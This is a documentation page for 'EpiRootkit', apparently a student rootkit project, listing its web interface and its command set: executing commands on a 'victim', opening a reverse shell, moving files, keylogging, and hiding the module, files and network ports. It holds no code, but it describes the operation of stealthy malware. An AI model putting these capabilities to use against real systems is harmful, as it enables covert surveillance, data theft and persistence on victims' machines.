![]() |
EpiRootkit
By STDBOOL
|
The rootkit can be used either through command line or via the integrated graphical interface. This page describes the available commands and web interface features.
To fully benefit from this section, please ensure the setup was performed correctly as described in the Setup section.
The web interface provides an intuitive way to control the rootkit. Access it at http://192.168.100.2:5000/
For detailed command documentation, refer to the French version or the inline help system.
connect [PASSWORD] - Authenticate to the rootkitdisconnect - Close connectionping - Test connectivityexec [COMMAND] - Execute command on victimgetshell [PORT] - Open reverse shelldownload [PATH] - Download file from victimupload [PATH] [SIZE] - Upload file to victimklgon - Enable keyloggerklgoff - Disable keylogger klg - Retrieve captured keystrokeshide_module - Hide rootkit moduleunhide_module - Unhide rootkit modulehooks hide [PATH] - Hide file/directoryhooks unhide [PATH] - Unhide file/directoryhooks forbid [PATH] - Block access to file/directoryhooks unforbid [PATH] - Unblock accesshooks modify [PATH] [OPTIONS] - Modify file content dynamicallyhooks add_port [PORT] - Hide network porthooks remove_port [PORT] - Unhide network port